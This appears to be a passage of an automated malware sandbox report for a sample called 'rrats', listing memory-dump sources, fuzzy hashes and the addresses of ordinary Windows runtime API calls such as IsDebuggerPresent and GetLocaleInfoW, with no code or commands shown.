• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
• Opcode ID: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
• Instruction ID: 59955b587bdf4f2769ab3a948b7085f11fcf9ea6b223ca72064e682746ba31c5
• Opcode Fuzzy Hash: 584ec3f361e96e69f5b0fb248c969afa05c3379a8a7fb42fe37c3f51a3987e00
• Instruction Fuzzy Hash: 89012B326001096BDF14DF29DC09BED7BAEEFC4324F0CC121ED29E7251DA38DA058680
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CC8FB5
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CC8FBF
• UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CC8FCC
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
• Instruction ID: e173534787a22aeaaa0e87d60989fa1db3ed23d34f734c05cfc4eb8701a2a01d
• Opcode Fuzzy Hash: f920a7cfc3e8aacee4ffde55de3eb5a87c303eb1735d8e14a1b6a91b8768c62b
• Instruction Fuzzy Hash: 1D31C275901229ABCB21DF68DC89BDDBBB8AF48310F5041EAE41CA7250EB709F858F55
Strings
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID:
• String ID: .
• API String ID: 0-248832578
• Opcode ID: 1e1560f7bb6d8aea14d77d7346ddae0a236274da3ddada5011457db606609066
• Instruction ID: 8dbe0796bbee5fc6e461fe488332b62a7127fdf3bcc76389afabdb6c2743b7a2
• Opcode Fuzzy Hash: 1e1560f7bb6d8aea14d77d7346ddae0a236274da3ddada5011457db606609066
• Instruction Fuzzy Hash: A531E6719002496FCB28DEB8CC85FFB7BBDDB85314F1441ACE92997252EB309E459B50
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
• Instruction ID: c6284ee5487deb50fad0ebce37c42d731e55e94a319bc17cbcf416f86d01abfa
• Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
• Instruction Fuzzy Hash: 1502FC71E002199BDF14DFA9D980BADB7F1EF48314F25816EE91AE7384D731AA41CB90
APIs
• GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CBAF35
• GetNumberFormatW.KERNEL32(00000400,00000000,?,00CDE72C,?,?), ref: 00CBAF84
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: FormatInfoLocaleNumber
• String ID:
• API String ID: 2169056816-0
• Opcode ID: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
• Instruction ID: 2d67d9677fbc8055bee64332ed5e28888d5c95e43316d974a205c65810466b91
• Opcode Fuzzy Hash: 420ee20afe06dc38b0ba399e2350d28c0c5d8a4c5ab884e937297fe6921e1abf
• Instruction Fuzzy Hash: 9A015E7A200359AAD7109FA4DC45FAF77B8EF08710F015026FB1597250D3709915CBA6
APIs
• GetLastError.KERNEL32(00CA6DDF,00000000,00000400), ref: 00CA6C74
• FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CA6C95
Memory Dump Source
• Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
• Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
• Instruction ID: 72bf21c68f3580f77205353af29f44920c3faaa5dcfbf65244c4ed91bbc8f493
• Opcode Fuzzy Hash: 540ec87b02a9d069a4bc02da7f90ec5a75ed05c5d1dda172e492364c43090241
• Instruction Fuzzy Hash: 05D0C731345301BFFA110B614D06F1E7B59BF55B95F18C4057755D40E0D6749514A615
                                                              APIs
                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CD19EF,?,?,00000008,?,?,00CD168F,00000000), ref: 00CD1C21
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise
                                                              • String ID:
                                                              • API String ID: 3997070919-0
                                                              • Opcode ID: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                              • Instruction ID: 47d8e45faf2e8bb860e091777073412090d8adc0421020aafab85efc4d74d3d8
                                                              • Opcode Fuzzy Hash: 4b00c7b19df80a82e286b6963e8d36df2a0d3a871de5f1556bb97e788a348217
                                                              • Instruction Fuzzy Hash: D2B14E71220609AFD715CF28C486B657BE0FF45364F29865AE9AACF3A1C335DA91CB40
                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CBF66A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                              • Instruction ID: ace4db2849967ba212ea7b737f1a511afa2d27beab67c363bef125fb521ddc1e
                                                              • Opcode Fuzzy Hash: dd4b9f585de4fb4d01dc5f050ff473508cc9036a084e156099ebf8b6ebf9b307
                                                              • Instruction Fuzzy Hash: 23519DB19016198FEB25CF94EC817AEBBF0FB48304F24846AD415EB391D7759A01CB60
                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                              • Instruction ID: 4fe3a8d608af4eacb1c34c9333941b7c7576d1f6e258ccdbd006a63a2169262f
                                                              • Opcode Fuzzy Hash: b6d4d38524100840bc8dc3147b0551a9c7a64b8e38297954088b8773f57f5ed5
                                                              • Instruction Fuzzy Hash: 9DF01DB5D002488FDB18DB18EC917DD77F1E749319F14429ADA2597390C370AE90CE61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: gj
                                                              • API String ID: 0-4203073231
                                                              • Opcode ID: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                              • Instruction ID: d4f2628b6cac4198afda2990819e6630062a0cd8c4436917ac5e8abdfdcb6313
                                                              • Opcode Fuzzy Hash: 863b3caa624afaaca67ebd4aefed3b64d5ec18a988eab2630c6572fb9e7c70ec
                                                              • Instruction Fuzzy Hash: 26C14672A183818FC354CF29D88065AFBE1BFC8308F19892EE998D7351D734E945CB96
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00CBF3A5), ref: 00CBF9DA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                              • Instruction ID: 5153fed595bfdc0d7ff2c6595a259234487630d14be924f87b5fa943c3f72048
                                                              • Opcode Fuzzy Hash: 57b785fb7f9f5ea7f8034d53b6de70f77d99a3b6b90ac7b8ba775b8fdec1cf05
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                              • Instruction ID: 2adc24e9dfd606526e0d03dc48b22c0361187f80cd211f7cd4ca0c6396f654c7
                                                              • Opcode Fuzzy Hash: 7026d86e24307fc3f3231268b99caaaf5925f6186d97bf77070ccfc7ebc7d8bf
                                                              • Instruction Fuzzy Hash: 20A02230203302CFCB00CF30AF0C30C3BE8AA003E0308002BA00CC0230EF3080A0AB22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                              • Instruction ID: e555325c9aaf8688fc40acd03ba8c30853f091d3092d1872c0cba28d93197e14
                                                              • Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
                                                              • Instruction Fuzzy Hash: C662D7716047859FCB25CF28C4906F9BBE1BF95304F08896DE8EA8B346D738EA45DB11
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                              • Instruction ID: 05a2ad6bcbb5c747250dd358d83ac4277fa0fa259c7bdcfde1c4a2fb89b030ba
                                                              • Opcode Fuzzy Hash: ea09b33de8b9cfbb8209bfa1a333bac43e177ce32cd9c289141a45ee596f7016
                                                              • Instruction Fuzzy Hash: 7162B5716083858FCB15CF28C8905B9BBE1BFD5304F188A6DEDAA8B346D730E945CB55
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                              • Instruction ID: e31e4ec304ec9064acc6a56d895dbc2dfc47706f075a1115257a519ba905f100
                                                              • Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
                                                              • Instruction Fuzzy Hash: B9523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                              • Instruction ID: b8c62e839d71f82337375de5524540d1e148c048ae88b9579aba949aad727e7c
                                                              • Opcode Fuzzy Hash: 4a22f14758ff886800d2f21801ec84327974cf8622922ce1c05d899e4e2cb7a2
                                                              • Instruction Fuzzy Hash: 7612C1B16087069FC728CF28C490AB9B7E1FF94304F148A2EE996C7780E734E995DB45
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                              • Instruction ID: 03c1ce28fd8710d40f80db24d83b842f0e326c5451482e11fbd84063342ee197
                                                              • Opcode Fuzzy Hash: 6c9a0788a0853c4ad9995f1ce5c6070a64e594a890393df94407baf0bfc7a70c
                                                              • Instruction Fuzzy Hash: 52F18971A083028FC718CF29C5C4A2EBBE5FF9A318F154A2EF496D7255D630EA458B46
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 458b409b802cc795dc5a441d9cf110191d3e30ff2c19d9311f1b9018b1576c10
                                                              • Instruction ID: e535c4c8564f3b7f32a56d0c6e312c5f4b85b0a80b1a5b918a213b052dc25b1a
                                                              • Opcode Fuzzy Hash: 458b409b802cc795dc5a441d9cf110191d3e30ff2c19d9311f1b9018b1576c10
                                                              • Instruction Fuzzy Hash: E9E147755183948FC304CF29D88096EBFF0AF9A314F46095EF9D49B352C235EA19DBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                              • Instruction ID: cd23999b681ada56532648fb445f07e4e6da1ef8efca42042ef954935a77ed97
                                                              • Opcode Fuzzy Hash: c3e033f5a90b6653f2820811019e1f3a5f035301b3a61585745d11b019002b2e
                                                              • Instruction Fuzzy Hash: F29167B060834A9BDB2CEEA8D895BFE77D5EB61304F10092CF596872C3DB349645E352
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: abefc68aebdcfc362c05d49eae353beb2692af992bbbfd0f199748d051e66b67
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 9B814AB17087465BDB3CDE68C8D1BFD37D4AB91308F00092DE9968B283DA74898AD756
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
